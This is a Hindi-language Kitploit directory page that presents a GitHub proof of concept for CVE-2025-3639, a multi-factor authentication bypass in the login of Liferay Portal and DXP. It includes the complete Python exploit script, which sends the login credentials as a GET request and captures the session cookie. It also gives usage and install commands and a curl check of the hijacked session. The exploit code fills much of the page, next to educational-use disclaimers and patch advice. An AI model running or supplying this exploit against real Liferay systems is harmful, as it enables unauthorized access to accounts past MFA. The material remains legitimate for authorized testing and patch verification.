Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-3639 — Liferay Portal (संस्करण 7.3.0–7.4.3.132) और Liferay DXP (2024.Q1 से 2025.Q1.6 तक विभिन्न संस्करण) में लॉगिन बाईपास भेद्यता | Kitploit
उपकरण/GitHubGitHub/6lj/cve-2025-3639
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub6lj/cve-2025-3639

CVE-2025-3639

Liferay Portal (संस्करण 7.3.0–7.4.3.132) और Liferay DXP (2024.Q1 से 2025.Q1.6 तक विभिन्न संस्करण) में लॉगिन बाईपास भेद्यता

रिपॉजिटरी देखें
211 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-3639 PoC - Liferay Portal/DXP लॉगिन बाईपास

इस रिपॉजिटरी में CVE-2025-3639 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो Liferay Portal (संस्करण 7.3.0–7.4.3.132) और Liferay DXP (2024.Q1 से 2025.Q1.6 तक विभिन्न संस्करणों) में एक लॉगिन बाईपास भेद्यता है। PoC दर्शाता है कि कैसे एक अप्रमाणित उपयोगकर्ता वैध क्रेडेंशियल्स के साथ POST अनुरोध को GET अनुरोध में संशोधित करके मल्टी-फैक्टर ऑथेंटिकेशन (MFA) को बायपास कर सकता है, संभावित रूप से उपयोगकर्ता खातों तक अनधिकृत पहुंच प्राप्त कर सकता है।

चेतावनी: यह PoC केवल शैक्षिक उद्देश्यों के लिए है। इस भेद्यता का अनधिकृत परीक्षण या दोहन अवैध और अनैतिक है। केवल सिस्टम स्वामी से स्पष्ट लिखित अनुमति प्राप्त करके उपयोग करें।

आवश्यकताएँ

  • पर्यावरण: Linux (जैसे, Kali Linux, Ubuntu, या वर्चुअलाइज्ड सेटअप)।
  • निर्भरताएँ:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • नेटवर्क: लक्ष्य Liferay Portal/DXP इंस्टेंस तक पहुँच (स्पष्ट अनुमति के साथ परीक्षण वातावरण में होना चाहिए)।
  • क्रेडेंशियल्स: लक्ष्य Liferay इंस्टेंस के लिए वैध उपयोगकर्ता क्रेडेंशियल्स।

स्थापना

  1. रिपॉजिटरी को क्लोन करें:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. सुनिश्चित करें कि Python 3 और requests लाइब्रेरी स्थापित हैं:

    root@kitploit:~
    pip3 install requests
    

यह क्या करता है

  • PoC POST लॉगिन अनुरोध को GET अनुरोध में संशोधित करके CVE-2025-3639 का शोषण करता है, जिससे MFA जाँच बायपास हो जाती है।
  • यह वैध क्रेडेंशियल्स के साथ एक क्राफ्टेड HTTP GET अनुरोध भेजकर MFA प्रक्रिया को पूरा किए बिना प्रमाणीकरण करता है।
  • स्क्रिप्ट को नियंत्रित, अधिकृत वातावरण में भेद्यता प्रदर्शित करने के लिए डिज़ाइन किया गया है।

उपयोग

PoC स्क्रिप्ट को उपयुक्त तर्कों के साथ चलाएँ (<target_url>, <username>, और <password> को लक्ष्य Liferay इंस्टेंस URL और वैध क्रेडेंशियल्स से बदलें)।

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • पैरामीटर्स:
    • --target: Liferay Portal/DXP इंस्टेंस का URL (जैसे, http://example.com)।
    • --username: लक्ष्य इंस्टेंस के लिए वैध उपयोगकर्ता नाम।
    • --password: उपयोगकर्ता नाम के लिए वैध पासवर्ड।

उदाहरण

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

परिणाम सत्यापित करें

  • सफलता: यदि शोषण काम करता है, तो स्क्रिप्ट एक वैध सत्र टोकन या MFA के बिना उपयोगकर्ता खाते तक पहुँच का संकेत देने वाला सफलता संदेश लौटाएगी।

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • अपेक्षित आउटपुट: सफल प्रमाणीकरण की पुष्टि करने वाले उपयोगकर्ता विवरण।
  • विफलता: यदि सर्वर कोई त्रुटि लौटाता है (जैसे, 401 Unauthorized या 403 Forbidden), तो इंस्टेंस संभवतः संवेदनशील नहीं है, या MFA सक्षम नहीं है।

  • ट्रैफ़िक की निगरानी करें: HTTP ट्रैफ़िक का निरीक्षण करने के लिए Wireshark जैसे टूल का उपयोग करें:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

PoC स्क्रिप्ट

नीचे poc.py का नमूना कोड है:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

महत्वपूर्ण नोट्स

  • इस PoC के लिए वैध क्रेडेंशियल्स आवश्यक हैं, क्योंकि भेद्यता MFA को बायपास करने की अनुमति देती है, लेकिन क्रेडेंशियल्स का अनुमान लगाने की नहीं।
  • केवल नियंत्रित वातावरण में सिस्टम स्वामी से स्पष्ट अनुमति के साथ परीक्षण करें।
  • भेद्यता को Liferay Portal/DXP के नए संस्करणों में पैच किया गया है। इस मुद्दे को कम करने के लिए नवीनतम संस्करण में अपडेट करें।
  • Liferay Security Advisory
  • NVD CVE-2025-3639
  • GitHub Repository

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस PoC के किसी भी अनधिकृत या अवैध उपयोग के लिए जिम्मेदार नहीं है। परीक्षण से पहले हमेशा सिस्टम स्वामी से स्पष्ट अनुमति प्राप्त करें।

टूल डाउनलोड करें